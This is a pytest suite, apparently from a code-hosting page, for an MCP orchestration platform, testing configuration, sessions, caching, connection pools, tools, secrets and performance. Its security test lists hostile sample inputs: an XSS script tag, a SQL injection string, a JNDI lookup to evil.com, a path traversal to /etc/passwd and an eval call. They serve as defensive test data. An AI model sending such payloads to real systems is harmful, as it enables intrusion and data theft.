rajkumarrawal's picture
Initial commit
2ec0d39
"""
Comprehensive Testing Suite for MCP Orchestration Platform
Enterprise-grade testing with high coverage and real-world scenarios
"""
import asyncio
import pytest
import tempfile
import json
import os
from unittest.mock import Mock, AsyncMock, patch, MagicMock
from typing import Dict, Any, List
import time
import uuid
import hashlib
# Import components to test
from mcp_orchestrator import (
MCPOrchestrator, ConfigManager, SessionManager, MultiLayerCache,
ConnectionPool, ToolManager, ServerConfig, SessionInfo,
CircuitBreakerState, ServerState
)
from secrets_manager import (
SecretsManager, LocalSecretsStore, EnvironmentSecretsStore
)
from gradio_interface import MCPUI
# =============================================================================
# Test Configuration and Fixtures
# =============================================================================
@pytest.fixture
def event_loop():
"""Create an instance of the default event loop for the test session."""
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.fixture
def temp_dir():
"""Create a temporary directory for tests."""
with tempfile.TemporaryDirectory() as tmp_dir:
yield tmp_dir
@pytest.fixture
def sample_server_config():
"""Create a sample server configuration."""
return ServerConfig(
id="test_server",
name="Test MCP Server",
url="http://localhost:8000",
auth_token="test_token",
timeout=30,
max_retries=3,
max_connections=5
)
@pytest.fixture
def mock_aiohttp_session():
"""Create a mock aiohttp session."""
session = Mock()
session.get = AsyncMock()
session.post = AsyncMock()
session.close = AsyncMock()
return session
@pytest.fixture
def orchestrator():
"""Create a test orchestrator instance."""
config = {
'servers': {
'test_server': {
'name': 'Test Server',
'url': 'http://localhost:8000',
'auth_token': 'test_token'
}
},
'session_ttl': 3600,
'cache_ttl': 300,
'max_workers': 5
}
with patch.object(ConfigManager, 'load_config', return_value=config):
orchestrator = MCPOrchestrator()
return orchestrator
# =============================================================================
# Configuration Management Tests
# =============================================================================
class TestConfigManager:
"""Test configuration management functionality."""
def test_load_from_env(self, temp_dir):
"""Test loading configuration from environment variables."""
os.environ['MCP_SERVER_TEST_SERVER_NAME'] = 'Test Server'
os.environ['MCP_SERVER_TEST_SERVER_URL'] = 'http://localhost:8000'
os.environ['MCP_HOST'] = '0.0.0.0'
os.environ['MCP_PORT'] = '7860'
os.environ['MCP_DEBUG'] = 'true'
config_manager = ConfigManager()
config = config_manager.load_from_env()
assert 'servers' in config
assert 'test_server' in config['servers']
assert config['servers']['test_server']['name'] == 'Test Server'
assert config['host'] == '0.0.0.0'
assert config['port'] == 7860
assert config['debug'] is True
def test_load_from_json_file(self, temp_dir):
"""Test loading configuration from JSON file."""
config_data = {
'app_name': 'Test App',
'host': 'localhost',
'port': 8080,
'servers': {
'test_server': {
'name': 'Test Server',
'url': 'http://localhost:8000'
}
}
}
config_file = os.path.join(temp_dir, 'config.json')
with open(config_file, 'w') as f:
json.dump(config_data, f)
config_manager = ConfigManager()
config = config_manager.load_from_file(config_file)
assert config['app_name'] == 'Test App'
assert config['servers']['test_server']['name'] == 'Test Server'
def test_merge_configs(self):
"""Test merging multiple configuration dictionaries."""
config1 = {'a': 1, 'b': {'x': 1}}
config2 = {'b': {'y': 2}, 'c': 3}
config3 = {'d': 4}
config_manager = ConfigManager()
merged = config_manager.merge_configs(config1, config2, config3)
assert merged['a'] == 1
assert merged['b']['x'] == 1
assert merged['b']['y'] == 2
assert merged['c'] == 3
assert merged['d'] == 4
def test_get_nested_config(self):
"""Test getting nested configuration values."""
config_manager = ConfigManager()
config_manager.config = {
'servers': {
'test': {
'url': 'http://localhost:8000',
'timeout': 30
}
}
}
assert config_manager.get('servers.test.url') == 'http://localhost:8000'
assert config_manager.get('servers.test.timeout') == 30
assert config_manager.get('servers.test.nonexistent', 'default') == 'default'
assert config_manager.get('nonexistent.key', 'default') == 'default'
# =============================================================================
# Session Management Tests
# =============================================================================
class TestSessionManager:
"""Test session management functionality."""
@pytest.mark.asyncio
async def test_create_session(self, orchestrator):
"""Test session creation."""
session = await orchestrator.session_manager.create_session(
user_id="test_user",
ip_address="127.0.0.1",
user_agent="Test Agent"
)
assert session.session_id is not None
assert session.user_id == "test_user"
assert session.ip_address == "127.0.0.1"
assert session.user_agent == "Test Agent"
assert session.total_requests == 0
assert session.success_rate == 0.0
@pytest.mark.asyncio
async def test_get_session(self, orchestrator):
"""Test session retrieval."""
# Create a session
created_session = await orchestrator.session_manager.create_session()
# Retrieve the session
retrieved_session = await orchestrator.session_manager.get_session(
created_session.session_id
)
assert retrieved_session.session_id == created_session.session_id
assert retrieved_session.user_id == created_session.user_id
@pytest.mark.asyncio
async def test_session_expiry(self, orchestrator):
"""Test session expiration."""
# Create a session with short TTL
session = await orchestrator.session_manager.create_session()
session.ttl_seconds = 1 # 1 second TTL
# Session should exist initially
retrieved = await orchestrator.session_manager.get_session(session.session_id)
assert retrieved is not None
# Wait for expiry
await asyncio.sleep(2)
# Session should be expired
retrieved = await orchestrator.session_manager.get_session(session.session_id)
assert retrieved is None
@pytest.mark.asyncio
async def test_rate_limiting(self, orchestrator):
"""Test session rate limiting."""
session = await orchestrator.session_manager.create_session()
# Should allow requests within limit
allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
session.session_id
)
assert allowed is True
assert wait_time == 0.0
# Simulate reaching rate limit
limiter = orchestrator.session_manager.rate_limiters[session.session_id]
limiter['requests'] = limiter['max_requests'] + 1
# Should be rate limited
allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
session.session_id
)
assert allowed is False
assert wait_time > 0
@pytest.mark.asyncio
async def test_session_stats(self, orchestrator):
"""Test session statistics."""
# Create multiple sessions
sessions = []
for i in range(3):
session = await orchestrator.session_manager.create_session()
sessions.append(session)
stats = await orchestrator.session_manager.get_session_stats()
assert stats['total_sessions'] == 3
assert stats['active_connections'] == 0
assert 'avg_session_age' in stats
assert 'rate_limited_sessions' in stats
# =============================================================================
# Cache System Tests
# =============================================================================
class TestMultiLayerCache:
"""Test multi-layer caching functionality."""
@pytest.mark.asyncio
async def test_cache_set_and_get(self):
"""Test setting and getting cache entries."""
cache = MultiLayerCache(max_size=10)
# Set a value
etag = await cache.set('test_key', {'data': 'test_value'}, ttl=300)
assert etag is not None
# Get the value
value, found, returned_etag = await cache.get('test_key')
assert found is True
assert value == {'data': 'test_value'}
assert returned_etag == etag
@pytest.mark.asyncio
async def test_cache_expiry(self):
"""Test cache entry expiration."""
cache = MultiLayerCache(default_ttl=1) # 1 second TTL
# Set a value with short TTL
await cache.set('test_key', 'test_value', ttl=1)
# Should be available immediately
value, found, _ = await cache.get('test_key')
assert found is True
# Wait for expiry
await asyncio.sleep(2)
# Should be expired
value, found, _ = await cache.get('test_key')
assert found is False
@pytest.mark.asyncio
async def test_cache_etag_support(self):
"""Test ETag support for cache validation."""
cache = MultiLayerCache()
# Set initial value
etag = await cache.set('test_key', {'data': 'test_value'})
# Request with matching ETag (should return not modified)
value, not_modified, returned_etag = await cache.get('test_key', etag=etag)
assert not_modified is True
assert returned_etag == etag
# Request with different ETag (should return value)
value, not_modified, returned_etag = await cache.get('test_key', etag='different_etag')
assert not_modified is False
assert value == {'data': 'test_value'}
@pytest.mark.asyncio
async def test_cache_lru_eviction(self):
"""Test LRU cache eviction."""
cache = MultiLayerCache(max_size=2)
# Fill cache to capacity
await cache.set('key1', 'value1')
await cache.set('key2', 'value2')
# Add third item (should evict least recently used)
await cache.set('key3', 'value3')
# First item should be evicted
value, found, _ = await cache.get('key1')
assert found is False
# Other items should still be available
value, found, _ = await cache.get('key2')
assert found is True
value, found, _ = await cache.get('key3')
assert found is True
@pytest.mark.asyncio
async def test_cache_invalidation(self):
"""Test cache invalidation."""
cache = MultiLayerCache()
# Set multiple values
await cache.set('prefix_key1', 'value1')
await cache.set('prefix_key2', 'value2')
await cache.set('other_key', 'value3')
# Invalidate by pattern
await cache.invalidate_pattern('prefix_')
# Pattern-matched keys should be invalid
value, found, _ = await cache.get('prefix_key1')
assert found is False
value, found, _ = await cache.get('prefix_key2')
assert found is False
# Non-matching key should remain
value, found, _ = await cache.get('other_key')
assert found is True
def test_cache_statistics(self):
"""Test cache statistics."""
cache = MultiLayerCache()
# Simulate cache operations
cache.hits = 80
cache.misses = 20
stats = cache.get_stats()
assert stats['size'] == 0 # No entries set
assert stats['hits'] == 80
assert stats['misses'] == 20
assert stats['hit_rate'] == 0.8 # 80 / (80 + 20)
# =============================================================================
# Connection Pool Tests
# =============================================================================
class TestConnectionPool:
"""Test connection pool functionality."""
@pytest.mark.asyncio
async def test_pool_initialization(self, sample_server_config):
"""Test connection pool initialization."""
from mcp_orchestrator import MCPOrcMetrics
metrics = MCPOrcMetrics()
pool = ConnectionPool(sample_server_config, metrics)
await pool.initialize()
assert len(pool.pool) > 0
assert not pool.available.empty()
@pytest.mark.asyncio
async def test_get_connection(self, sample_server_config):
"""Test getting connection from pool."""
from mcp_orchestrator import MCPOrcMetrics
metrics = MCPOrcMetrics()
pool = ConnectionPool(sample_server_config, metrics)
await pool.initialize()
# Get a connection
async with pool.get_connection() as session:
assert session is not None
assert session in pool.in_use
@pytest.mark.asyncio
async def test_circuit_breaker(self, sample_server_config):
"""Test circuit breaker functionality."""
from mcp_orchestrator import MCPOrcMetrics
metrics = MCPOrcMetrics()
# Set low threshold for testing
sample_server_config.circuit_breaker_threshold = 2
pool = ConnectionPool(sample_server_config, metrics)
await pool.initialize()
# Simulate failures to trigger circuit breaker
for _ in range(3):
try:
async with pool.get_connection() as session:
# Simulate connection failure
raise Exception("Simulated failure")
except Exception:
pass
# Circuit breaker should be open
assert pool.circuit_breaker_state == CircuitBreakerState.OPEN
@pytest.mark.asyncio
async def test_health_check(self, sample_server_config):
"""Test health check functionality."""
from mcp_orchestrator import MCPOrcMetrics
metrics = MCPOrcMetrics()
pool = ConnectionPool(sample_server_config, metrics)
await pool.initialize()
# Mock health check response
with patch('aiohttp.ClientSession.get') as mock_get:
mock_response = Mock()
mock_response.status = 200
mock_get.return_value.__aenter__ = AsyncMock(return_value=mock_response)
is_healthy = await pool._perform_health_check()
assert is_healthy is True
# =============================================================================
# Tool Management Tests
# =============================================================================
class TestToolManager:
"""Test tool management functionality."""
@pytest.mark.asyncio
async def test_tool_schema_validation(self, orchestrator):
"""Test tool parameter validation."""
# Create a sample tool schema
tool_schema = {
"name": "test_tool",
"description": "Test tool",
"input_schema": {
"type": "object",
"properties": {
"param1": {"type": "string", "description": "First parameter"},
"param2": {"type": "number", "description": "Second parameter"}
},
"required": ["param1"]
}
}
# Valid parameters
valid_params = {"param1": "test", "param2": 123}
orchestrator.tool_manager._validate_parameters(valid_params, tool_schema)
# Missing required parameter
invalid_params = {"param2": 123}
with pytest.raises(ValueError):
orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema)
# Wrong parameter type
invalid_params = {"param1": "test", "param2": "not_a_number"}
with pytest.raises(ValueError):
orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema)
@pytest.mark.asyncio
async def test_tool_search(self, orchestrator):
"""Test tool search functionality."""
# Add mock tools
orchestrator.tools = {
"server1": {
"weather_tool": Mock(
description="Get weather information",
tags=["weather", "api"]
),
"calculator_tool": Mock(
description="Perform calculations",
tags=["math", "calculator"]
)
}
}
# Search for weather tools
results = await orchestrator.tool_manager.search_tools("weather")
assert len(results) > 0
assert any("weather" in result["tool_name"] for result in results)
# Search by tag
results = await orchestrator.tool_manager.search_tools("", tags=["weather"])
assert len(results) > 0
@pytest.mark.asyncio
async def test_relevance_scoring(self, orchestrator):
"""Test relevance scoring for search results."""
from mcp_orchestrator import ToolSchema
# Create test schema
schema = ToolSchema(
name="weather_forecast",
description="Get weather forecast for locations",
tags=["weather", "forecast", "climate"]
)
# Test different queries
score_exact = orchestrator.tool_manager._calculate_relevance("weather_forecast", schema)
score_partial = orchestrator.tool_manager._calculate_relevance("weather", schema)
score_tag = orchestrator.tool_manager._calculate_relevance("climate", schema)
assert score_exact > score_partial > score_tag
assert score_exact == 1.0 # Exact match
def test_tool_statistics(self, orchestrator):
"""Test tool manager statistics."""
# Add mock data
orchestrator.tools = {
"server1": {"tool1": Mock(), "tool2": Mock()},
"server2": {"tool3": Mock(), "tool4": Mock(), "tool5": Mock()}
}
stats = orchestrator.tool_manager.get_stats()
assert stats["total_servers"] == 2
assert stats["total_tools"] == 5
assert stats["tools_per_server"] == 2.5
# =============================================================================
# Secrets Management Tests
# =============================================================================
class TestSecretsManager:
"""Test secrets management functionality."""
@pytest.mark.asyncio
async def test_local_secrets_store(self, temp_dir):
"""Test local secrets storage."""
from cryptography.fernet import Fernet
# Generate encryption key
key = Fernet.generate_key()
store = LocalSecretsStore(key, temp_dir)
# Store a secret
success = await store.set_secret('test_key', 'test_value', ttl=3600)
assert success is True
# Retrieve the secret
value = await store.get_secret('test_key')
assert value == 'test_value'
# List secrets
secrets = await store.list_secrets()
assert 'test_key' in secrets
# Delete secret
success = await store.delete_secret('test_key')
assert success is True
# Verify deletion
value = await store.get_secret('test_key')
assert value is None
@pytest.mark.asyncio
async def test_secrets_expiry(self, temp_dir):
"""Test secret expiration."""
from cryptography.fernet import Fernet
key = Fernet.generate_key()
store = LocalSecretsStore(key, temp_dir)
# Store secret with short TTL
await store.set_secret('test_key', 'test_value', ttl=1)
# Should be available immediately
value = await store.get_secret('test_key')
assert value == 'test_value'
# Wait for expiry
await asyncio.sleep(2)
# Should be expired
value = await store.get_secret('test_key')
assert value is None
@pytest.mark.asyncio
async def test_environment_secrets_store(self):
"""Test environment variable secrets store."""
store = EnvironmentSecretsStore()
# Set environment variable
os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
# Retrieve secret
value = await store.get_secret('test_key')
assert value == 'test_value'
# List secrets
secrets = await store.list_secrets()
assert 'test_key' in secrets
# Delete secret
success = await store.delete_secret('test_key')
assert success is True
@pytest.mark.asyncio
async def test_secrets_manager_orchestrator(self):
"""Test secrets manager orchestrator."""
config = {
'primary_backend': 'env',
'env_enabled': True
}
manager = SecretsManager(config)
# Test environment backend
os.environ['MCP_SECRET_TEST_KEY'] = 'test_value'
# Get secret
value = await manager.get_secret('test_key')
assert value == 'test_value'
# List secrets
secrets = await manager.list_secrets()
assert 'test_key' in secrets
@pytest.mark.asyncio
async def test_secrets_rotation(self):
"""Test secret rotation functionality."""
config = {
'primary_backend': 'env',
'env_enabled': True
}
manager = SecretsManager(config)
# Set initial secret
os.environ['MCP_SECRET_OLD_KEY'] = 'old_value'
# Rotate to new key
success = await manager.rotate_secrets('old_key', 'new_key')
assert success is True
# Verify old key is gone and new key exists
assert os.getenv('MCP_SECRET_OLD_KEY') != 'old_value'
assert os.getenv('MCP_SECRET_NEW_KEY') == 'old_value'
@pytest.mark.asyncio
async def test_health_check(self):
"""Test secrets manager health check."""
config = {
'primary_backend': 'env',
'env_enabled': True
}
manager = SecretsManager(config)
health = await manager.health_check()
assert 'env' in health
assert isinstance(health['env'], bool)
# =============================================================================
# Integration Tests
# =============================================================================
class TestOrchestratorIntegration:
"""Test orchestrator integration scenarios."""
@pytest.mark.asyncio
async def test_full_workflow(self, orchestrator):
"""Test complete workflow from server registration to tool invocation."""
# Mock server response
mock_tools = {
"test_tool": {
"name": "test_tool",
"description": "Test tool",
"input_schema": {
"type": "object",
"properties": {
"message": {"type": "string"}
},
"required": ["message"]
}
}
}
# Create session
session = await orchestrator.session_manager.create_session()
# Mock tool discovery
with patch.object(
orchestrator.tool_manager,
'_discover_tools',
return_value=mock_tools
):
# Register server
await orchestrator.register_server(
ServerConfig(
id="test_server",
name="Test Server",
url="http://localhost:8000"
)
)
# Verify server is registered
assert "test_server" in orchestrator.servers
assert "test_server" in orchestrator.connection_pools
# Mock tool invocation
with patch.object(
orchestrator.connection_pools["test_server"],
'get_connection'
) as mock_get_connection:
mock_session = AsyncMock()
mock_response = AsyncMock()
mock_response.json.return_value = {
"result": {"message": "Tool executed successfully"}
}
mock_response.raise_for_status = Mock()
mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response)
mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session)
# Invoke tool
result = await orchestrator.invoke_tool(
"test_server",
"test_tool",
{"message": "Hello, world!"},
session.session_id
)
assert result["status"] == "success"
@pytest.mark.asyncio
async def test_error_handling(self, orchestrator):
"""Test error handling in various scenarios."""
# Test non-existent server
with pytest.raises(ValueError):
await orchestrator.invoke_tool(
"non_existent_server",
"test_tool",
{},
"test_session"
)
# Test non-existent session
with pytest.raises(ValueError):
await orchestrator.invoke_tool(
"test_server",
"test_tool",
{},
"non_existent_session"
)
@pytest.mark.asyncio
async def test_concurrent_requests(self, orchestrator):
"""Test handling of concurrent requests."""
# Create multiple sessions
sessions = []
for i in range(5):
session = await orchestrator.session_manager.create_session()
sessions.append(session)
# Simulate concurrent tool invocations
tasks = []
for i, session in enumerate(sessions):
task = orchestrator.invoke_tool(
"test_server",
"test_tool",
{"request_id": i},
session.session_id
)
tasks.append(task)
# All tasks should complete (with mocked responses)
with patch.object(
orchestrator.connection_pools["test_server"],
'get_connection'
) as mock_get_connection:
mock_session = AsyncMock()
mock_response = AsyncMock()
mock_response.json.return_value = {"result": "success"}
mock_response.raise_for_status = Mock()
mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response)
mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session)
# Mock register_server to avoid actual HTTP calls
with patch.object(orchestrator, 'register_server'):
# Register test server first
await orchestrator.register_server(
ServerConfig(
id="test_server",
name="Test Server",
url="http://localhost:8000"
)
)
# Run concurrent requests
results = await asyncio.gather(*tasks, return_exceptions=True)
# All should complete without exceptions
for result in results:
if isinstance(result, Exception):
pytest.fail(f"Unexpected exception: {result}")
@pytest.mark.asyncio
async def test_metrics_collection(self, orchestrator):
"""Test metrics collection and reporting."""
# Create a session and perform some operations
session = await orchestrator.session_manager.create_session()
# Get metrics
metrics = await orchestrator.get_metrics()
assert "servers" in metrics
assert "session_stats" in metrics
assert "cache_stats" in metrics
assert "tool_stats" in metrics
# Verify session metrics
session_stats = metrics["session_stats"]
assert session_stats["total_sessions"] >= 1
@pytest.mark.asyncio
async def test_graceful_shutdown(self, orchestrator):
"""Test graceful shutdown process."""
# Create some background tasks
orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1)))
orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1)))
# Perform shutdown
await orchestrator.shutdown()
# All background tasks should be cancelled
for task in orchestrator.background_tasks:
assert task.cancelled()
# =============================================================================
# Performance Tests
# =============================================================================
class TestPerformance:
"""Test performance characteristics."""
@pytest.mark.asyncio
async def test_cache_performance(self):
"""Test cache performance with large datasets."""
cache = MultiLayerCache(max_size=1000)
# Set many entries
start_time = time.time()
for i in range(1000):
await cache.set(f"key_{i}", f"value_{i}")
set_time = time.time() - start_time
# Get many entries
start_time = time.time()
for i in range(1000):
await cache.get(f"key_{i}")
get_time = time.time() - start_time
# Performance should be reasonable (less than 1 second each)
assert set_time < 1.0
assert get_time < 1.0
@pytest.mark.asyncio
async def test_session_creation_performance(self, orchestrator):
"""Test session creation performance."""
# Create many sessions
start_time = time.time()
sessions = []
for i in range(100):
session = await orchestrator.session_manager.create_session()
sessions.append(session)
creation_time = time.time() - start_time
# Should create 100 sessions in under 1 second
assert creation_time < 1.0
# All sessions should be retrievable
for session in sessions:
retrieved = await orchestrator.session_manager.get_session(session.session_id)
assert retrieved is not None
@pytest.mark.asyncio
async def test_memory_usage(self, orchestrator):
"""Test memory usage under load."""
import psutil
import os
process = psutil.Process(os.getpid())
initial_memory = process.memory_info().rss
# Create many sessions
sessions = []
for i in range(1000):
session = await orchestrator.session_manager.create_session()
sessions.append(session)
# Check memory increase
final_memory = process.memory_info().rss
memory_increase = final_memory - initial_memory
# Memory increase should be reasonable (less than 100MB)
assert memory_increase < 100 * 1024 * 1024 # 100MB in bytes
# =============================================================================
# Security Tests
# =============================================================================
class TestSecurity:
"""Test security features."""
@pytest.mark.asyncio
async def test_input_sanitization(self, orchestrator):
"""Test input sanitization and validation."""
# Test malicious input
malicious_inputs = [
"<script>alert('xss')</script>",
"'; DROP TABLE users; --",
"${jndi:ldap://evil.com/a}",
"../../../etc/passwd",
"eval('malicious_code')"
]
for malicious_input in malicious_inputs:
# Should handle gracefully without errors
session = await orchestrator.session_manager.create_session()
try:
# This should not raise exceptions
await orchestrator.invoke_tool(
"test_server",
"test_tool",
{"param": malicious_input},
session.session_id
)
except ValueError as e:
# Expected for invalid inputs
assert "validation" in str(e).lower() or "invalid" in str(e).lower()
except Exception:
# Other exceptions should be handled gracefully
pass
@pytest.mark.asyncio
async def test_rate_limiting_security(self, orchestrator):
"""Test rate limiting prevents abuse."""
# Create a session
session = await orchestrator.session_manager.create_session()
# Simulate rapid requests to test rate limiting
requests_made = 0
rate_limited = 0
for i in range(150): # Exceed the default rate limit
allowed, wait_time = await orchestrator.session_manager.check_rate_limit(
session.session_id
)
if allowed:
requests_made += 1
# Simulate making the request
await orchestrator.session_manager.update_session_activity(session.session_id)
else:
rate_limited += 1
assert wait_time > 0
# Should allow some requests but rate limit others
assert requests_made <= 100 # Default rate limit
assert rate_limited > 0
@pytest.mark.asyncio
async def test_session_isolation(self, orchestrator):
"""Test session isolation and security."""
# Create multiple sessions
session1 = await orchestrator.session_manager.create_session(user_id="user1")
session2 = await orchestrator.session_manager.create_session(user_id="user2")
# Sessions should be isolated
assert session1.session_id != session2.session_id
# Each session should only access its own data
# (This is enforced by passing session_id to orchestrator methods)
# Test session expiry isolation
session1.ttl_seconds = 1
await asyncio.sleep(2)
# Session1 should be expired
expired_session = await orchestrator.session_manager.get_session(session1.session_id)
assert expired_session is None
# Session2 should still be active
active_session = await orchestrator.session_manager.get_session(session2.session_id)
assert active_session is not None
def test_configuration_sensitivity(self):
"""Test that sensitive configuration is handled properly."""
config_manager = ConfigManager()
# Test that secrets are not logged
with patch('structlog.get_logger') as mock_logger:
config_manager.load_from_env()
# Check that no sensitive data was logged
for call in mock_logger.return_value.info.call_args_list:
args = call[0]
if len(args) > 0:
# Should not contain sensitive patterns
assert 'password' not in str(args).lower()
assert 'secret' not in str(args).lower()
assert 'token' not in str(args).lower()
# =============================================================================
# Test Runner Configuration
# =============================================================================
def pytest_configure(config):
"""Configure pytest with custom markers."""
config.addinivalue_line(
"markers", "slow: marks tests as slow (deselect with '-m \"not slow\"')"
)
config.addinivalue_line(
"markers", "integration: marks tests as integration tests"
)
config.addinivalue_line(
"markers", "performance: marks tests as performance tests"
)
def pytest_collection_modifyitems(config, items):
"""Automatically mark tests."""
for item in items:
# Mark integration tests
if "test_orchestrator_integration" in item.nodeid:
item.add_marker(pytest.mark.integration)
# Mark performance tests
if "test_performance" in item.nodeid:
item.add_marker(pytest.mark.performance)
# Mark slow tests
if "slow" in item.keywords or any("slow" in str(mark) for mark in item.iter_markers()):
item.add_marker(pytest.mark.slow)
# =============================================================================
# Test Data and Utilities
# =============================================================================
def create_test_server_config(server_id: str = "test") -> ServerConfig:
"""Create a test server configuration."""
return ServerConfig(
id=server_id,
name=f"Test {server_id.title()} Server",
url=f"http://localhost:{8000 + hash(server_id) % 1000}",
auth_token=f"token_{server_id}",
timeout=30,
max_retries=3,
max_connections=10
)
def create_test_tool_schema(tool_name: str = "test_tool") -> Dict[str, Any]:
"""Create a test tool schema."""
return {
"name": tool_name,
"description": f"Test tool {tool_name}",
"input_schema": {
"type": "object",
"properties": {
"message": {
"type": "string",
"description": "Message to process",
"minLength": 1,
"maxLength": 1000
},
"priority": {
"type": "integer",
"description": "Priority level",
"minimum": 1,
"maximum": 10,
"default": 5
}
},
"required": ["message"]
},
"examples": [
{"message": "Hello, world!", "priority": 1},
{"message": "Important task", "priority": 8}
],
"tags": ["test", "utility"],
"version": "1.0.0"
}
async def wait_for_condition(condition_func, timeout: float = 5.0, interval: float = 0.1):
"""Wait for a condition to become true."""
start_time = time.time()
while time.time() - start_time < timeout:
if await condition_func() if asyncio.iscoroutinefunction(condition_func) else condition_func():
return True
await asyncio.sleep(interval)
return False
# =============================================================================
# Main Test Execution
# =============================================================================
if __name__ == "__main__":
# Run tests with coverage
pytest.main([
__file__,
"--cov=mcp_orchestrator",
"--cov=secrets_manager",
"--cov=gradio_interface",
"--cov-report=html",
"--cov-report=term",
"-v"
])